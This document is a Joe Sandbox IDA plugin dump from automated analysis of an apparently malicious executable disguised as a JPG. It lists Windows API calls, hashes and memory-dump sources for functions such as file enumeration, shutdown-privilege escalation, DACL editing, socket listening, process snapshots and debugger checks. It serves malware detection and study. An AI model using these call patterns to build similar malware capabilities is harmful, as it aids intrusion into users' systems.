                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderPath$LocalTime__swprintf
                                                                                                          • String ID: %.3d
                                                                                                          • API String ID: 3337348382-986655627
                                                                                                          • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                          • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 2640511053-438819550
                                                                                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                          • GetLastError.KERNEL32 ref: 00433414
                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                          • API String ID: 2938487562-3733053543
                                                                                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                          APIs
                                                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1255039815-0
                                                                                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                          APIs
                                                                                                          • __swprintf.LIBCMT ref: 00433073
                                                                                                          • __swprintf.LIBCMT ref: 00433085
                                                                                                          • __wcsicoll.LIBCMT ref: 00433092
                                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                          • LockResource.KERNEL32(?), ref: 00433120
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                          • String ID:
                                                                                                          • API String ID: 1158019794-0
                                                                                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1737998785-0
                                                                                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                          • API String ID: 4194297153-14809454
                                                                                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_strncmp
                                                                                                          • String ID: @oH$\$^$h
                                                                                                          • API String ID: 2175499884-3701065813
                                                                                                          • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                          • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                          • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                          • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 540024437-0
                                                                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                          • API String ID: 0-2872873767
                                                                                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                          • __wsplitpath.LIBCMT ref: 00475644
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcscat.LIBCMT ref: 00475657
                                                                                                          • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2547909840-0
                                                                                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                          • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                          • String ID: *.*$\VH
                                                                                                          • API String ID: 2786137511-2657498754
                                                                                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID: pqI
                                                                                                          • API String ID: 2579439406-2459173057
                                                                                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                          APIs
                                                                                                          • __wcsicoll.LIBCMT ref: 00433349
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                          • __wcsicoll.LIBCMT ref: 00433375
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                          Strings
                                                                                                          Memory Dump Source
